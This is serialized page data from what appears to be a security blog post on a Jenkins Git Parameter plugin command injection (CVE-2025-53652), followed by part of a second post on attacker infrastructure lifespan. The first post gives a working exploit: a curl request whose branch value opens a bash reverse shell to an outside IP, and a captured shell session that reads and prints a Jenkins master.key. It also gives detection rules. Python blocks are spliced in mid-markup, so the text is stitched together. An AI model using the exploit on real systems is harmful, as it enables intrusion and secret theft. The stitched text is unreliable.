For example, the following pipeline configuration defines a job that operates on the ",[886,36243,36244],{},"master"," branch.",[18,36247,36248],{},[68,36249],{":width":10862,"alt":36250,"src":36251},"A normal pipeline configuration","\u002Fblog\u002Fgit-parameter-rce\u002Fconfig-normal.png",[18,36253,36254,36255,36257],{},"When the build runs with a normal value like ",[886,36256,36244],{},", everything behaves as expected.",[18,36259,36260],{},[68,36261],{":width":10862,"alt":36262,"src":36263},"Normal build output","\u002Fblog\u002Fgit-parameter-rce\u002Fnormal-output.png",[18,36265,36266,36267,36270,36271,59],{},"As shown above, the first command (",[886,36268,36269],{},"git rev-parse",") incorporates the user-provided parameter. We can confirm that this input is not validated by setting the branch to something like ",[886,36272,36273],{},"$(sleep 80)",[18,36275,36276],{},[68,36277],{":width":10862,"alt":36278,"src":36279},"A pipeline config with an exploit in it","\u002Fblog\u002Fgit-parameter-rce\u002Fconfig-exploited.png",[18,36281,36282,36283,36285,36286,59],{},"When the build runs with ",[886,36284,36273],{}," as the parameter, the injected command appears in the output, and the process hangs during ",[886,36287,36288],{},"git fetch",[18,36290,36291],{},[68,36292],{":width":10862,"alt":36293,"src":36294},"Exploited build output","\u002Fblog\u002Fgit-parameter-rce\u002Fexploited-output.png",[18,36296,36297,36298,36301,36302,36304,36305,36308],{},"A quick look at ",[886,36299,36300],{},"ps faux"," on the Jenkins host confirms that ",[886,36303,36288],{}," spawns a child process executing the attacker-supplied ",[886,36306,36307],{},"sleep"," command.",[1354,36310,36312],{"className":34366,"code":36311,"language":34368,"meta":219,"style":219},"USER        PID COMMAND\njenkins     7 java -Duser.home=\u002Fvar\u002Fjenkins_home -Djenkins.model.Jenkins.slaveAgentPort=50000 -Dhudson.lifecycle=hudson.l\njenkins     6912  \\_ git fetch --tags --force --progress -- 
testuser@git:\u002Fhome\u002Ftestuser\u002Ftest_repo.git +refs\u002Fheads\u002F*:refs\u002Frem\njenkins     6916    \\_ \u002Fbin\u002Fsh \u002Fvar\u002Fjenkins_home\u002Fworkspace\u002FbuildName\u002F$(sleep 80)@tmp\u002Fjenkins-gitclient-ssh5385459547173378\njenkins     6917        \\_ sleep 80\n",[886,36313,36314,36319,36324,36329,36334],{"__ignoreMap":219},[1373,36315,36316],{"class":1375,"line":1376},[1373,36317,36318],{"class":9383},"USER        PID COMMAND\n",[1373,36320,36321],{"class":1375,"line":220},[1373,36322,36323],{"class":9383},"jenkins     7 java -Duser.home=\u002Fvar\u002Fjenkins_home -Djenkins.model.Jenkins.slaveAgentPort=50000 -Dhudson.lifecycle=hudson.l\n",[1373,36325,36326],{"class":1375,"line":1266},[1373,36327,36328],{"class":9383},"jenkins     6912  \\_ git fetch --tags --force --progress -- testuser@git:\u002Fhome\u002Ftestuser\u002Ftest_repo.git +refs\u002Fheads\u002F*:refs\u002Frem\n",[1373,36330,36331],{"class":1375,"line":1852},[1373,36332,36333],{"class":9383},"jenkins     6916    \\_ \u002Fbin\u002Fsh \u002Fvar\u002Fjenkins_home\u002Fworkspace\u002FbuildName\u002F$(sleep 80)@tmp\u002Fjenkins-gitclient-ssh5385459547173378\n",[1373,36335,36336],{"class":1375,"line":4692},[1373,36337,36338],{"class":9383},"jenkins     6917        \\_ sleep 80\n",[18,36340,36341,36342,36344,36345,36347],{},"While ",[886,36343,36307],{}," demonstrates command injection, it doesn't cross any real security boundaries. 
To show practical impact, the following ",[886,36346,1557],{}," command can be used to trigger a reverse shell.",[1354,36349,36351],{"className":34366,"code":36350,"language":34368,"meta":219,"style":219},"curl -kv 'http:\u002F\u002Fjenkins:8080\u002Fjob\u002F[buildName]\u002Fbuild' -X POST \\\n  -H 'Cookie: [cookie];' \\\n  --data-urlencode 'Jenkins-Crumb=[crumb]' \\\n  --data-urlencode 'json={\"parameter\":{\"name\":\"BRANCH_PARAM\",\"value\":\"\\$(bash -c \\\"bash &> \u002Fdev\u002Ftcp\u002F10.9.49.196\u002F1270 \u003C&1\\\")\"}}'\n",[886,36352,36353,36358,36363,36368],{"__ignoreMap":219},[1373,36354,36355],{"class":1375,"line":1376},[1373,36356,36357],{"class":9383},"curl -kv 'http:\u002F\u002Fjenkins:8080\u002Fjob\u002F[buildName]\u002Fbuild' -X POST \\\n",[1373,36359,36360],{"class":1375,"line":220},[1373,36361,36362],{"class":9383},"  -H 'Cookie: [cookie];' \\\n",[1373,36364,36365],{"class":1375,"line":1266},[1373,36366,36367],{"class":9383},"  --data-urlencode 'Jenkins-Crumb=[crumb]' \\\n",[1373,36369,36370],{"class":1375,"line":1852},[1373,36371,36372],{"class":9383},"  --data-urlencode 'json={\"parameter\":{\"name\":\"BRANCH_PARAM\",\"value\":\"\\$(bash -c \\\"bash &> \u002Fdev\u002Ftcp\u002F10.9.49.196\u002F1270 \u003C&1\\\")\"}}'\n",[18,36374,36375],{},"To execute the attack, you'll need to provide three pieces of information:",[1789,36377,36378,36381,36384],{},[25,36379,36380],{},"The name of the build. 
All of our examples use “buildName”.",[25,36382,36383],{},"A valid session cookie (even when exploiting unauthenticated instances).",[25,36385,36386,36387,36390],{},"A Jenkins-Crumb (a CSRF token) for the ",[886,36388,36389],{},"\u002Fjob\u002F[buildName]\u002Fbuild"," endpoint.",[18,36392,36393,36394,36397,36398,59],{},"If successful, the server will respond with a ",[886,36395,36396],{},"201 Created",", and the reverse shell can be caught with ",[886,36399,30202],{},[1354,36401,36403],{"className":34366,"code":36402,"language":34368,"meta":219,"style":219},"albinolobster@lastpoint:~$ nc -lvnp 1270\nListening on 0.0.0.0 1270\nConnection received on 172.18.0.3 55664\nid\nuid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)\ncat ~\u002Fsecrets\u002Fmaster.key\n05322ff531f1b52117bf013b2fe77b40dacbc56268d68b9e234216fe825a0073a5c8051181033f630e67c408d58c3ef631e18ba8b8e6722e64d3c1380518e89a91b4256c5c348febceb24ef32f144045ed422dfb4bdc840aca33814989e431aa00db6df7c403da38247324783811d46c6f3caa1f9b1b26d979fff4391249ca8a\n",[886,36404,36405,36414,36418,36423,36427,36432,36437],{"__ignoreMap":219},[1373,36406,36407,36410,36412],{"class":1375,"line":1376},[1373,36408,36409],{"class":9372},"albinolobster@lastpoint:~",[1373,36411,4644],{"class":1383},[1373,36413,35379],{"class":4640},[1373,36415,36416],{"class":1375,"line":220},[1373,36417,35384],{"class":9383},[1373,36419,36420],{"class":1375,"line":1266},[1373,36421,36422],{"class":9383},"Connection received on 172.18.0.3 55664\n",[1373,36424,36425],{"class":1375,"line":1852},[1373,36426,9460],{"class":9383},[1373,36428,36429],{"class":1375,"line":4692},[1373,36430,36431],{"class":9383},"uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)\n",[1373,36433,36434],{"class":1375,"line":4724},[1373,36435,36436],{"class":9383},"cat 
~\u002Fsecrets\u002Fmaster.key\n",[1373,36438,36439],{"class":1375,"line":4756},[1373,36440,36441],{"class":9383},"05322ff531f1b52117bf013b2fe77b40dacbc56268d68b9e234216fe825a0073a5c8051181033f630e67c408d58c3ef631e18ba8b8e6722e64d3c1380518e89a91b4256c5c348febceb24ef32f144045ed422dfb4bdc840aca33814989e431aa00db6df7c403da38247324783811d46c6f3caa1f9b1b26d979fff4391249ca8a\n",[18,36443,36444,36445,36448,36449,59],{},"The output confirms that the shell runs as the ",[886,36446,36447],{},"jenkins"," user, and we’re able to read the ",[886,36450,36451],{},"master.key",[1920,36453,36455],{"id":36454},"authenticated-or-not","Authenticated or Not?",[18,36457,36458,36459,36462],{},"By default, Jenkins requires authentication, and under that configuration, this vulnerability does require credentials. Yet the CVSS vector assigned to it includes ",[886,36460,36461],{},"PR:N"," (Privileges Required: None). This rating is based on two possible configurations:",[1789,36464,36465,36468],{},[25,36466,36467],{},"Jenkins can be set up with authentication disabled entirely.",[25,36469,36470],{},"Jenkins can allow anyone to create accounts freely.",[18,36472,36473],{},[68,36474],{":width":10862,"alt":36475,"src":36476},"Auth configuration options","\u002Fblog\u002Fgit-parameter-rce\u002Fdisable-auth.png",[18,36478,36479,36480,36483,36484,36487,36488,36491],{},"While arbitrary user sign-up is uncommon, unauthenticated Jenkins instances are not. According to FOFA, out of more than 100,000",[47,36481,491],{"href":36482},"#user-content-fn-3"," internet-facing Jenkins servers that require authentication, only about 1,000",[47,36485,380],{"href":36486},"#user-content-fn-4"," have open registration. 
However, roughly 15,000",[47,36489,401],{"href":36490},"#user-content-fn-5"," appear to have authentication disabled entirely, though we haven’t confirmed how many of those use the Git Parameter plugin.",[18,36493,36494],{},[68,36495],{":width":10862,"alt":36496,"src":36497},"FOFA Jenkins query","\u002Fblog\u002Fgit-parameter-rce\u002Ffofa-unauth.png",[18,36499,36500],{},"Even when authentication is disabled, exploitation still requires a valid session cookie, knowledge of the build name, and the Jenkins crumb. This might slow down tools like Nuclei, but it's unlikely to stop a determined attacker. All of this can typically be retrieved with just a couple of requests:",[1354,36502,36504],{"className":34366,"code":36503,"language":34368,"meta":219,"style":219},"curl -kv http:\u002F\u002Flocalhost:8080\u002F -o \u002Fdev\u002Fnull\ncurl -kv http:\u002F\u002Flocalhost:8080\u002Fjob\u002FbuildName\u002Fbuild -H 'Cookie: [cookie]' | grep \"data-crumb-value=\"\n",[886,36505,36506,36511],{"__ignoreMap":219},[1373,36507,36508],{"class":1375,"line":1376},[1373,36509,36510],{"class":9383},"curl -kv http:\u002F\u002Flocalhost:8080\u002F -o \u002Fdev\u002Fnull\n",[1373,36512,36513],{"class":1375,"line":220},[1373,36514,36515],{"class":9383},"curl -kv http:\u002F\u002Flocalhost:8080\u002Fjob\u002FbuildName\u002Fbuild -H 'Cookie: [cookie]' | grep \"data-crumb-value=\"\n",[18,36517,36518],{},"From there, exploitation proceeds as described above.",[1920,36520,36522],{"id":36521},"detections-and-indicators","Detections and Indicators",[18,36524,36525],{},"One nice thing about the Jenkins plugin system is that it clearly informs administrators when a plugin needs to be upgraded.",[18,36527,36528],{},[68,36529],{":width":10862,"alt":36496,"src":36530},"\u002Fblog\u002Fgit-parameter-rce\u002Fplugin-warning.png",[18,36532,36533,36534,36537],{},"Although Jenkins clearly flags outdated plugins, the Git Parameter patch",[47,36535,356],{"href":36536},"#user-content-fn-6"," includes a flag 
that allows the fix to be disabled:",[1925,36539,36540,36543],{},[18,36541,36542],{},"If a bug in the plugin prevents you from using that safer setting, the validation can be disabled by setting the system property",[1354,36544,36547],{"className":36545,"code":36546,"language":1359,"meta":219},[1357],"-Dnet.uaznia.lukanus.hudson.plugins.gitparameter.GitParameterDefinition.allowAnyParameterValue=true\n",[886,36548,36546],{"__ignoreMap":219},[18,36550,36551],{},"As a result, this vulnerability may persist even after the plugin is upgraded. The most reliable place to detect exploitation is on the wire. To help with that, the VulnCheck Initial Access team has developed the following Suricata rule:",[1354,36553,36556],{"className":36554,"code":36555,"language":1359,"meta":219},[1357],"alert http any any -> any any ( \\\n   msg:\"VULNCHECK Jenkins Git-Parameter Plugin CVE-2025-53652 Build Param Injection\"; \\\n   flow:established,to_server; \\\n   http.method; content:\"POST\"; \\\n   http.uri; content:\"\u002Fjob\"; startswith; \\\n   content:\"\u002Fbuild\"; \\\n   http.request_body; content:\"parameter\"; \\\n   content:\"name\"; distance: 0; \\\n   content:\"Jenkins-Crumb\"; \\\n   content:\"value\"; \\\n   pcre:\"\u002Fvalue[^&]*(\\;|%3b|\\||%7c|\u003C|%3c|>|%3e|\\(|%28|\\)|%29|\\$|%24|`|%60|\\\"|%22|'|%27|\\\\|%5c|%26)\u002Fi\"; \\\n   reference:cve,CVE-2025-53652; \\\n   classtype:web-application-attack; \\\n   sid:12700622; rev:2; \\\n   metadata: deployment Datacenter, deployment SSLDecrypt;)\n",[886,36557,36555],{"__ignoreMap":219},[18,36559,36560,36561,36564],{},"As mentioned earlier, the injected parameter also persists in Jenkins job logs. These logs can be found on disk under ",[886,36562,36563],{},"~\u002Fjobs\u002FbuildName\u002Fbuilds\u002F#\u002Flog",". 
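The two checks this section describes, on the wire and on disk, as an added example in Python that is not code from the original post or from the plugin. It restates the metacharacter test of the Suricata rule on the URL-decoded request body, pulls the branch value back out of the `git rev-parse --resolve-git-dir` line in a build log, and models the allowlist validation the patch adds together with the allowAnyParameterValue switch that turns it off. The request bodies, log lines, crumb value and IP address are constructed; the plugin's real Java code is not reproduced.

```python
"""Spot CVE-2025-53652-style Git Parameter injection on the wire and on disk.

Added example, not code from the original post or from the plugin.  The
request bodies, log lines, crumb and IP address are constructed; the Suricata
rule on the page stays the network signature, this is its logic in Python.
"""
import json
import re
from urllib.parse import parse_qs, urlencode

# Metacharacters the Suricata rule's pcre looks for inside a "value" field.
# We match on the URL-decoded body, so the %3b / %7c / %24 ... forms in the
# rule collapse into their literal characters here.
SHELL_META = re.compile(r"""[;|<>()$`"'\\&]""")

# A JSON string literal following a "value" key.  Tolerant of escapes that
# are not valid JSON (such as \$ in the hand-built payload on the page).
VALUE_FIELD = re.compile(r'"value"\s*:\s*"((?:\\.|[^"\\])*)"')

# The plugin feeds the value into `git rev-parse --resolve-git-dir
# <workspace>/<job>/<value>/.git`, so it survives in builds/<n>/log.
REV_PARSE = re.compile(
    r"git rev-parse --resolve-git-dir \S*?/workspace/[^/\s]+/(.+?)/\.git"
)


def suspicious_values(body: str) -> list:
    """Wire check: every parameter value in a /job/<name>/build POST body
    that carries shell metacharacters.  An empty list means clean."""
    hits = []
    for raw in parse_qs(body, keep_blank_values=True).get("json", []):
        for m in VALUE_FIELD.finditer(raw):
            value = re.sub(r"\\(.)", r"\1", m.group(1))  # undo \" \\ \$ ...
            if SHELL_META.search(value):
                hits.append(value)
    return hits


def injected_values_in_log(log_text: str) -> list:
    """Disk check: recover the branch value from each rev-parse line and keep
    the ones that contain shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        m = REV_PARSE.search(line)
        if m and SHELL_META.search(m.group(1)):
            hits.append(m.group(1))
    return hits


def accept_parameter(value: str, offered: set, allow_any: bool = False) -> bool:
    """Models an allowlist check of the kind the patch adds: only a value the
    plugin itself offered passes.  allow_any stands in for the
    allowAnyParameterValue property, which switches the check off again.
    (The plugin's real Java code is not reproduced here.)"""
    return True if allow_any else value in offered


def build_body(value: str, crumb: str = "0123456789abcdef") -> str:
    """Constructed request body in the shape the curl command on the page
    sends: form-encoded, with a Jenkins-Crumb field and a json field."""
    payload = {"parameter": {"name": "BRANCH_PARAM", "value": value}}
    return urlencode({"Jenkins-Crumb": crumb, "json": json.dumps(payload)})


# Constructed samples: a benign branch, the page's sleep probe, a reverse shell.
BODY_BENIGN = build_body("feature/login-fix")
BODY_INJECTED = build_body("$(sleep 80)")
BODY_REVSHELL = build_body('$(bash -c "bash &> /dev/tcp/192.0.2.10/1270 <&1")')

# Constructed build log in the shape of the excerpt on the page.
LOG_SAMPLE = "\n".join([
    "Started by user admin",
    "The recommended git tool is: NONE",
    " > git rev-parse --resolve-git-dir /var/jenkins_home/workspace/buildName/feature/login-fix/.git # timeout=10",
    " > git rev-parse --resolve-git-dir /var/jenkins_home/workspace/buildName/$(sleep 80)/.git # timeout=10",
])

if __name__ == "__main__":
    for body in (BODY_BENIGN, BODY_INJECTED, BODY_REVSHELL):
        print("wire:", suspicious_values(body) or "clean")
    print("disk:", injected_values_in_log(LOG_SAMPLE))
    print("allowlist:", accept_parameter("$(sleep 80)", {"master", "feature/login-fix"}))
```

Run it directly to see the three bodies classified; for the disk side, feed `injected_values_in_log` the contents of a job's `builds/<n>/log`. Git itself allows `$`, `(` and `)` in ref names, so the metacharacter test is an indicator rather than proof; confirm a hit against the refs the job actually offers before escalating.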
For example:",[1354,36566,36568],{"className":34366,"code":36567,"language":34368,"meta":219,"style":219},"jenkins@2e8cd409b819:~\u002Fjobs\u002FbuildName\u002Fbuilds\u002F17$ cat log\nStarted by user\n… truncated …\nThe recommended git tool is: NONE\nusing credential f0cb5f5f-fa1a-4a89-9f1d-63d6bbaff7c8\n > git rev-parse --resolve-git-dir \u002Fvar\u002Fjenkins_home\u002Fworkspace\u002FbuildName\u002F$(sleep 80)\u002F.git # timeout=10\n",[886,36569,36570,36580,36585,36590,36595,36600],{"__ignoreMap":219},[1373,36571,36572,36575,36577],{"class":1375,"line":1376},[1373,36573,36574],{"class":9372},"jenkins@2e8cd409b819:~\u002Fjobs\u002FbuildName\u002Fbuilds\u002F17",[1373,36576,4644],{"class":1383},[1373,36578,36579],{"class":4640}," cat log\n",[1373,36581,36582],{"class":1375,"line":220},[1373,36583,36584],{"class":9383},"Started by user\n",[1373,36586,36587],{"class":1375,"line":1266},[1373,36588,36589],{"class":9383},"… truncated …\n",[1373,36591,36592],{"class":1375,"line":1852},[1373,36593,36594],{"class":9383},"The recommended git tool is: NONE\n",[1373,36596,36597],{"class":1375,"line":4692},[1373,36598,36599],{"class":9383},"using credential f0cb5f5f-fa1a-4a89-9f1d-63d6bbaff7c8\n",[1373,36601,36602],{"class":1375,"line":4724},[1373,36603,36604],{"class":9383}," > git rev-parse --resolve-git-dir \u002Fvar\u002Fjenkins_home\u002Fworkspace\u002FbuildName\u002F$(sleep 80)\u002F.git # timeout=10\n",[18,36606,36607],{},"In short, traces of exploitation may linger both on the wire and on disk.",[1920,36609,1903],{"id":1902},[18,36611,36612],{},"This vulnerability, originally disclosed as medium severity, ultimately has the characteristics of a critical issue. While we don’t expect widespread exploitation, it’s the kind of flaw that attackers will find useful, particularly in targeted environments or during lateral movement.",[18,36614,36615],{},"And while we had hoped for some creative Git parameter golf, it turned out to be straightforward command injection. 
No trick shots required.",[1920,36617,202],{"id":201},[18,36619,36620,36621,1246,36626,1246,36631,1255,36638,59],{},"The VulnCheck team is always on the lookout for new and interesting vulnerabilities to abuse. For more research like this, see our blogs ",[1131,36622,36623],{},[47,36624,35917],{"href":35913,"rel":36625},[51],[1131,36627,36628],{},[47,36629,35924],{"href":35920,"rel":36630},[51],[1131,36632,36633],{},[47,36634,36637],{"href":36635,"rel":36636},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fprojectsend-exploited-itw",[51],"ProjectSend CVE-2024-11680 Exploited in the Wild",[1131,36639,36640],{},[47,36641,35931],{"href":35927,"rel":36642},[51],[18,36644,33941,36645,33945,36648,1240,36651,1246,36654,1255,36657,1260],{},[47,36646,1233],{"href":10806,"rel":36647},[51],[47,36649,1239],{"href":1237,"rel":36650},[51],[47,36652,1245],{"href":1243,"rel":36653},[51],[47,36655,1251],{"href":1249,"rel":36656},[51],[47,36658,216],{"href":1258,"rel":36659},[51],[1920,36661,2850],{"id":2849},[61,36663,36665],{"id":36664},"footnotes","Footnotes",[1789,36667,36668,36678,36687,36696,36705,36714],{},[25,36669,36670,10515,36674],{},[47,36671,36672],{"href":36672,"rel":36673},"https:\u002F\u002Fwww.jenkins.io\u002Fsecurity\u002Fadvisory\u002F2025-07-09\u002F#SECURITY-3419",[51],[47,36675,36677],{"href":36676},"#user-content-fnref-1","↩",[25,36679,36680,10515,36684],{},[47,36681,36682],{"href":36682,"rel":36683},"https:\u002F\u002Fgtfobins.github.io\u002Fgtfobins\u002Fgit\u002F",[51],[47,36685,36677],{"href":36686},"#user-content-fnref-2",[25,36688,36689,10515,36693],{},[47,36690,36691],{"href":36691,"rel":36692},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=Ym9keT0iYXBwLXNpZ24taW4tcmVnaXN0ZXIiICYmIGljb25faGFzaD0iODE1ODYzMTIi",[51],[47,36694,36677],{"href":36695},"#user-content-fnref-3",[25,36697,36698,10515,36702],{},[47,36699,36700],{"href":36700,"rel":36701},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=Ym9keT0iYXBwLXNpZ24taW4tcmVnaXN0ZXJfX3N3aXRjaGVyIiA
mJiBpY29uX2hhc2g9IjgxNTg2MzEyIg%3D%3D",[51],[47,36703,36677],{"href":36704},"#user-content-fnref-4",[25,36706,36707,10515,36711],{},[47,36708,36709],{"href":36709,"rel":36710},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=Ym9keT0iSmVua2lucy1DcnVtYiIgJiYgaWNvbl9oYXNoPSI4MTU4NjMxMiI%3D",[51],[47,36712,36677],{"href":36713},"#user-content-fnref-5",[25,36715,36716,10515,36720],{},[47,36717,36718],{"href":36718,"rel":36719},"https:\u002F\u002Fgithub.com\u002Fjenkinsci\u002Fgit-parameter-plugin\u002Fcommit\u002Fcab84d3703c267dbdf3e1b4a06fcc51bbed4fcba",[51],[47,36721,36677],{"href":36722},"#user-content-fnref-6",[2901,36724,36725],{},"",{"title":219,"searchDepth":220,"depth":220,"links":36727},[36728],{"id":36664,"depth":220,"text":36665},"2025-08-07","CVE-2025-53652 was disclosed as a medium-severity vulnerability in the Jenkins Git Parameter plugin but it enables command injection and remote code execution when this popular plugin is installed. We break down the vulnerability and share detection guidance for defenders.",{"slug":36732},"git-parameter-rce","\u002Fblog\u002Fgit-parameter-rce",{"title":32017,"description":36730},"blog\u002Fgit-parameter-rce",[242,23275,1281],"Ftxmy0eO79IqVtCbbcrKZo9fxX8FBDqoR_bdPH7vV-I",{"id":36739,"title":36740,"articles":7,"authors":36741,"body":36743,"date":37228,"description":37229,"extension":234,"image":7,"link":7,"meta":37230,"navigation":237,"path":37232,"seo":37233,"series":7,"stem":37234,"subtype":7,"tags":37235,"__hash__":37236},"blog\u002Fblog\u002Fstillup-stillevil.md","Still Up. 
Still Evil.",[36742],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":36744,"toc":37225},[36745,36749,36752,36762,36769,36772,36776,36779,36951,36954,36958,36962,36982,36990,37019,37025,37028,37039,37045,37049,37091,37094,37156,37166,37169,37173,37176,37178,37181,37183,37206,37223],[1920,36746,36748],{"id":36747},"a-look-at-attacker-infrastructure-longevity","A Look at Attacker Infrastructure Longevity",[263,36750],{":list":36751,"ico":266,"title":20},"[\"Attacker infrastructure often persists for months. Tools like GoPhish, GOST, and Metasploit regularly remained online for the full 90-day analysis window.\",\"Lifespan reflects purpose. Short-lived frameworks like Cobalt Strike and Sliver support hands-on-keyboard operations, while proxies like SoftEther are left running to serve longer-term goals.\",\"Exposed infrastructure still gets used. Attackers continue to use exposed systems to achieve real-world objectives, even well after they’ve been identified by defenders.\"]",[18,36753,36754,36755,36761],{},"In our recent publication, ",[1131,36756,36757],{},[47,36758,36760],{"href":35920,"rel":36759},[51],"The Linuxsys Cryptominer",", we discussed attacker infrastructure that had been in use for eight months. Despite widespread exploit attempts, blog coverage, and security community chatter, the attacker stuck with the same setup. Same hosting. Same domain. No apparent disruption. So we took a closer look: how long do attackers typically keep their infrastructure running?",[18,36763,36764,36765,36768],{},"As part of our ",[47,36766,1251],{"href":1249,"rel":36767},[51]," offering, VulnCheck tracks over 100 different types of attacker software operating on internet-facing systems. Using this data, we examined how long attackers maintained their infrastructure over a 90-day period, from March through July 2025.",[18,36770,36771],{},"For this analysis, we focused on hosts associated with domain names. 
This allowed us to track infrastructure across IP rotations but excluded setups that do not rely on traditional domain resolution. These include IP-only botnets, peer-to-peer malware, TOR-based C2, and domain fronting via services like Cloudflare. These techniques add complexity to attribution and persistence tracking and were omitted to keep the analysis consistent.",[1920,36773,36775],{"id":36774},"attacker-tooling-longevity","Attacker Tooling Longevity",[18,36777,36778],{},"Over the 90-day period, we observed a wide range of attacker tooling in use. To keep things concise, here are the top ten by number of observed instances.",[307,36780,36781,36800],{},[310,36782,36783],{},[313,36784,36785,36788,36791,36794,36797],{},[316,36786,36787],{},"Tool Name",[316,36789,36790],{},"Instances Observed",[316,36792,36793],{},"Shortest Duration",[316,36795,36796],{},"Longest Duration",[316,36798,36799],{},"Median Duration",[336,36801,36802,36818,36833,36848,36862,36877,36892,36907,36922,36938],{},[313,36803,36804,36807,36810,36812,36815],{},[341,36805,36806],{},"GoPhish",[341,36808,36809],{},"376",[341,36811,12467],{},[341,36813,36814],{},"90 days",[341,36816,36817],{},"28 days",[313,36819,36820,36823,36826,36828,36830],{},[341,36821,36822],{},"Cobalt Strike",[341,36824,36825],{},"196",[341,36827,12467],{},[341,36829,36814],{},[341,36831,36832],{},"12.5 days",[313,36834,36835,36838,36841,36843,36845],{},[341,36836,36837],{},"Sliver",[341,36839,36840],{},"178",[341,36842,12467],{},[341,36844,36814],{},[341,36846,36847],{},"8 days",[313,36849,36850,36853,36856,36858,36860],{},[341,36851,36852],{},"Metasploit",[341,36854,36855],{},"94",[341,36857,12467],{},[341,36859,36814],{},[341,36861,36814],{},[313,36863,36864,36867,36870,36872,36874],{},[341,36865,36866],{},"Starkiller",[341,36868,36869],{},"78",[341,36871,12467],{},[341,36873,36814],{},[341,36875,36876],{},"10 
days",[313,36878,36879,36882,36885,36887,36889],{},[341,36880,36881],{},"Havoc",[341,36883,36884],{},"60",[341,36886,12467],{},[341,36888,36814],{},[341,36890,36891],{},"10.5 days",[313,36893,36894,36897,36900,36902,36904],{},[341,36895,36896],{},"Mythic",[341,36898,36899],{},"39",[341,36901,12467],{},[341,36903,36814],{},[341,36905,36906],{},"9 days",[313,36908,36909,36912,36915,36917,36919],{},[341,36910,36911],{},"msfconsole",[341,36913,36914],{},"24",[341,36916,12467],{},[341,36918,36814],{},[341,36920,36921],{},"22.5 days",[313,36923,36924,36927,36930,36932,36935],{},[341,36925,36926],{},"Confluence Godzilla Loader",[341,36928,36929],{},"20",[341,36931,12467],{},[341,36933,36934],{},"79 days",[341,36936,36937],{},"19 days",[313,36939,36940,36943,36945,36947,36949],{},[341,36941,36942],{},"Gh0st RAT",[341,36944,2837],{},[341,36946,12467],{},[341,36948,36814],{},[341,36950,12467],{},[18,36952,36953],{},"Nearly every tool we tracked hit the maximum possible value for \"Longest Duration\": at least one instance of each stayed online for the entire 90-day window. This suggests that, despite exposure and visibility, it's not unusual for attackers to run the same infrastructure for months at a time.",[61,36955,36957],{"id":36956},"attacker-tool-availability-days","Attacker Tool Availability (Days)",[11128,36959],{":labels":36960,":values":36961},"[\"GoPhish\",\"Cobalt Strike\",\"Sliver\",\"Metasploit\",\"Starkiller\",\"Havoc\",\"Mythic\",\"msfconsole\",\"Confluence Godzilla Loader\",\"Gh0st RAT\"]","[28,12.5,8,90,10,10.5,9,22.5,19,1]",[18,36963,36964,36965,1246,36969,1246,36973,1255,36977,36981],{},"However, the median durations are more modest. 
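How per-tool lifespans like those in the table are derived from raw sightings, as an added example that is not VulnCheck's code or data. Sightings are keyed by domain rather than by IP, so a domain that moves between addresses counts as one instance; IP-only hosts are dropped, as the methodology section describes; and a span is capped at the 90-day window, counted inclusively so that a single-day sighting is 1 day. The tool names, domains, IPs and dates below are constructed.

```python
"""Per-tool infrastructure lifespan from domain-keyed sightings.

Added example, not VulnCheck's code or data.  The sightings are constructed
to exercise the rules the analysis rests on: one domain across several IPs
is one instance, IP-only hosts are excluded, and spans are capped at the
observation window.
"""
from collections import defaultdict
from datetime import date
from statistics import median
from typing import NamedTuple, Optional

WINDOW_DAYS = 90  # length of the observation window assumed here


class Sighting(NamedTuple):
    tool: str
    domain: Optional[str]  # None for a host seen by IP only
    ip: str
    seen: date


def lifespans(sightings, window_days=WINDOW_DAYS):
    """Return {tool: {domain: days_online}}.

    days_online is last sighting minus first sighting, counted inclusively
    (a single sighting is 1 day) and capped at the window.  Keying on the
    domain means an IP rotation does not split one instance into two.
    """
    first, last = {}, {}
    for s in sightings:
        if s.domain is None:
            continue  # IP-only infrastructure is out of scope for this cut
        key = (s.tool, s.domain)
        first[key] = min(first.get(key, s.seen), s.seen)
        last[key] = max(last.get(key, s.seen), s.seen)
    spans = defaultdict(dict)
    for (tool, domain), start in first.items():
        days = (last[(tool, domain)] - start).days + 1
        spans[tool][domain] = min(days, window_days)
    return dict(spans)


def summarize(spans):
    """Shortest / longest / median per tool, the columns the table uses."""
    rows = {}
    for tool, by_domain in spans.items():
        d = sorted(by_domain.values())
        rows[tool] = {
            "instances": len(d),
            "shortest": d[0],
            "longest": d[-1],
            "median": median(d),
        }
    return rows


# Constructed sightings (tool, domain, ip, date) with defanged domains.
SIGHTINGS = [
    # Sliver C2 that rotated from 203.0.113.10 to 198.51.100.7: one instance.
    Sighting("Sliver", "c2.red-example[.]net", "203.0.113.10", date(2025, 4, 1)),
    Sighting("Sliver", "c2.red-example[.]net", "203.0.113.10", date(2025, 4, 5)),
    Sighting("Sliver", "c2.red-example[.]net", "198.51.100.7", date(2025, 4, 8)),
    # Seen once: 1 day.
    Sighting("Sliver", "update-cdn.example[.]org", "198.51.100.20", date(2025, 4, 10)),
    # IP-only Sliver host: excluded from the domain-based cut.
    Sighting("Sliver", None, "192.0.2.5", date(2025, 4, 2)),
    Sighting("Sliver", None, "192.0.2.5", date(2025, 4, 20)),
    # GoPhish that outlives the window: capped at 90.
    Sighting("GoPhish", "gophish.example-corp[.]de", "203.0.113.50", date(2025, 4, 1)),
    Sighting("GoPhish", "gophish.example-corp[.]de", "203.0.113.50", date(2025, 6, 29)),
    Sighting("GoPhish", "gophish.example-corp[.]de", "203.0.113.50", date(2025, 7, 5)),
    Sighting("GoPhish", "mail-login.example[.]in", "198.51.100.9", date(2025, 4, 15)),
    Sighting("GoPhish", "mail-login.example[.]in", "198.51.100.9", date(2025, 5, 12)),
    Sighting("GoPhish", "docs.example-update[.]fr", "203.0.113.77", date(2025, 5, 1)),
    Sighting("GoPhish", "docs.example-update[.]fr", "203.0.113.77", date(2025, 5, 3)),
]

if __name__ == "__main__":
    for tool, row in summarize(lifespans(SIGHTINGS)).items():
        print(f"{tool:10} n={row['instances']} shortest={row['shortest']} "
              f"longest={row['longest']} median={row['median']}")
```

The median column is what the chart on the page plots, and the window cap is the reason "90 days" is the ceiling for long-running kits such as GoPhish. Because the key is the domain, a tracker built this way also keeps counting an instance that changes hosting, which is what lets a long-lived phishing domain show up as one 90-day span rather than several short ones.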
